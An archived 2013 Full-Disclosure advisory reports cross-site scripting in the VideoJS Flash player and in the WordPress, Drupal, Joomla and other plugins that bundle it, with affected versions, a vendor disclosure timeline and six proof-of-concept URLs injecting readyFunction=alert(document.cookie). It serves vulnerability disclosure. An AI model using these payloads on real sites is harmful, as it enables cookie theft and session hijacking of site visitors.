lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-ID: <00c801ce4c2d$f4698b40$9b7a6fd5@pc>
Date: Wed, 8 May 2013 23:52:12 +0300
From: "MustLive" <mustlive@...security.com.ua>
To: <submissions@...ketstormsecurity.org>, <full-disclosure@...ts.grok.org.uk>,
 "1337 Exploit DataBase" <mr.inj3ct0r@...il.com>
Subject: Vulnerabilities in multiple web applications with
	VideoJS

Hello list!

These are Cross-Site Scripting vulnerabilities in multiple web applications 
with VideoJS. Earlier I've wrote about vulnerabilities in VideoJS 
(http://seclists.org/fulldisclosure/2013/May/21). This is popular video and 
audio player, which is used at hundreds thousands of web sites and in 
multiple web applications.

Among them are VideoJS - HTML5 Video Player for WordPress, Video.js for 
Drupal, bo:VideoJS for Joomla, videojs-youtube, Telemeta (CMS). And a lot of 
other web applications. All developers of these applications, the same as 
developers of all other web applications with VideoJS, need to update it in 
their software.

-------------------------
Affected products:
-------------------------

Vulnerable are web applications which are using VideoJS Flash Component 
3.0.2 and previous versions. Version VideoJS Flash Component 3.0.2 is not 
vulnerable to mentioned XSS hole, except XSS via JS callbacks (as it can be 
read in repository on github). Also there are bypass methods which work in 
the last version, but the developers haven't fixed them due to their low 
impact. So update to last version of VideoJS.swf.

Vulnerable are the next web applications:

VideoJS - HTML5 Video Player for WordPress 3.2.3 and previous versions.
Video.js for Drupal 6.x-2.2 and previous 6.x-2.x versions and 7.x-2.2 and 
previous 7.x-2.x versions (only these versions are using VideoJS Flash 
Component).
bo:VideoJS for Joomla 2.1.1 and previous versions (with VideoJS Flash 
Component).
videojs-youtube (all versions).
Telemeta 1.4.4 and previous versions.

All these developers were informed last week.

-------------------------
Affected vendors:
-------------------------

VideoJS and VideoJS Flash Component were developed by Zencoder.

Earlier Zencoder, now Brightcove
http://videojs.com

----------
Details:
----------

Cross-Site Scripting (WASC-08):

Original example for VideoJS:

http://site/video-js.swf?readyFunction=alert(document.cookie)

VideoJS - HTML5 Video Player for WordPress:

http://site/wp-content/plugins/videojs-html5-video-player-for-wordpress/videojs/video-js.swf?readyFunction=alert(document.cookie)

Video.js for Drupal:

http://site/sites/all/libraries/video-js/video-js.swf?readyFunction=alert(document.cookie)

bo:VideoJS for Joomla:

http://site/plugins/content/bo_videojs/video-js/video-js.swf?readyFunction=alert(document.cookie)

videojs-youtube:

http://site/lib/video-js.swf?readyFunction=alert(document.cookie)

Telemeta:

http://site/htdocs/video-js/video-js.swf?readyFunction=alert(document.cookie)

------------
Timeline:
------------ 

2013.02.07 - found XSS vulnerability.
2013.02.08 - informed developers of VideoJS about both vulnerabilities. They 
thanked and promised to fix it.
2013.02.23 - reminded VideoJS developers and asked for date of releasing the 
fix.
2013.03.09 - again reminded developers.
2013.03.26 - again reminded developers.
2013.04.08 - reminded developers on github and resent previous letter to 
Zencoder's developers (since Brightcove, which acquired Zencoder, ignored 
the hole for two months).
2013.04.08-30 - discussed with developers (on github and by e-mail). And 
made my own fix to force developers to fix the hole.
2013.04.30 - developers fixed XSS hole in VideoJS Flash Component 3.0.2 in 
source code on github.
2013.05.02 - developers compiled fixed version of swf (after my reminding) 
and uploaded to both repositories.
2013.05.02 - tested version 3.0.2 and found that developers haven't fixed 
the hole completely and informed them.
2013.05.03 - informed developers of VideoJS - HTML5 Video Player for 
WordPress.
2013.05.04 - informed developers of Video.js for Drupal, bo:VideoJS for 
Joomla, videojs-youtube, Telemeta. Alongside with sending letter to 
developer of bo:VideoJS, also I informed Joomla VEL. They put this extension 
from JED to VEL.
2013.05.05 - since developer of videojs-youtube had no e-mails in his github 
account and the his e-mail mentioned at different web sites was not working 
already, so I published my letter on github.
2013.05.07 - Telemeta developers answered and thanked (the only one among 
these developers).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua 


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ